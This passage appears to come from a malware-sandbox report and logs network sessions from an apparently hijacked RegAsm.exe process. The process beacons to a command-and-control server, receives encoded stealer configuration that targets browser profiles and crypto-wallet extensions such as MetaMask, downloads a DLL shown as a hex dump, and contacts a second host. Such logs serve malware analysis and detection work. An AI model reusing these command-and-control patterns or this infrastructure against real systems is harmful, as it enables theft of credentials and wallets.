4a 4b 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"f12b60bc2db6a57cb8f7e1265697a147------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CBGCAFIIECBFIDHIJKFBCont
2024-10-02 07:42:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:30 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49822	49.12.197.9	443	6876	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:30 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:30 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 32 62 36 30 62 63 32 64 62 36 61 35 37 63 62 38 66 37 65 31 32 36 35 36 39 37 61 31 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="token"f12b60bc2db6a57cb8f7e1265697a147------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------KEGCFCAKFHCGCBFHCGHDCont
2024-10-02 07:42:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:31 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49823	49.12.197.9	443	6876	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:32 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:32 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 32 62 36 30 62 63 32 64 62 36 61 35 37 63 62 38 66 37 65 31 32 36 35 36 39 37 61 31 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="token"f12b60bc2db6a57cb8f7e1265697a147------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------AEHIDAKECFIEBGDHJEBKCont
2024-10-02 07:42:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:32 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49825	49.12.197.9	443	6876	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:33 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 6237 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:33 UTC	6237	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 32 62 36 30 62 63 32 64 62 36 61 35 37 63 62 38 66 37 65 31 32 36 35 36 39 37 61 31 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="token"f12b60bc2db6a57cb8f7e1265697a147------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------KEGCFCAKFHCGCBFHCGHDCont
2024-10-02 07:42:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:34 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49826	49.12.197.9	443	6876	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:35 UTC	192	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:35 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:35 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:42:35 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:42:35 UTC	16120	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-10-02 07:42:35 UTC	16384	IN	Data Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-10-02 07:42:35 UTC	16384	IN	Data Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
2024-10-02 07:42:35 UTC	16384	IN	Data Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-10-02 07:42:35 UTC	16384	IN	Data Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-10-02 07:42:35 UTC	16384	IN	Data Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-10-02 07:42:35 UTC	16384	IN	Data Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: $td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-10-02 07:42:35 UTC	16384	IN	Data Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-10-02 07:42:35 UTC	16384	IN	Data Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-10-02 07:42:35 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$
2024-10-02 07:42:37 UTC	16384	IN	DELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count() FROM %Q.'%q_%s'tokencharsseparatorsL N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED] r:Y<\|=>MbP?\|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3\|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED] i" i"$i"0i"8i"Di"Pi"\i"hi" xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED] 9/I?hKd?81UH!G?#$0\|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1\|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED] !5ACPRSWYlm pr )Y"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49827	172.67.208.141	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:37 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: questionsmw.store
2024-10-02 07:42:37 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
